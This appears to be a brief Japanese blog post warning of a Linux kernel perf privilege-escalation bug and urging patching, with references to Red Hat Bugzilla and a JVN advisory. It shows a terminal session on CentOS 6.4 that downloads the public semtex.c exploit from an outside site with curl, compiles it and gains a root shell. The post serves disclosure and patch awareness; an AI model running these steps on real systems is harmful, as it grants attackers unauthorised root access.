Linux Kernelの久しぶりに深刻なバグです

perfが組み込まれている時にローカルユーザーから権限昇格が可能です

既に対策済みのKernelが配布されていますので早めのアップデートをオススメします

下記はCentOS 6.4 kernel-2.6.32-358.6.1.el6.x86_64にて実証コードを実行した場合です

# uname -r
2.6.32-358.6.1.el6.x86_64
# yum -y install gcc
# useradd semtex
# su - semtex
$ curl -O http://dl.packetstormsecurity.net/1305-exploits/semtex.c
$ gcc -O2 semtex.c -o semtex
$ ./semtex
$ -sh-4.1# whoami
root

RedHat Bugzilla

JVNVU#98369979 Linux カーネルに権限昇格の脆弱性

http://git.kernel.org 該当のコード

Exploit: semtex.c

コメントを残す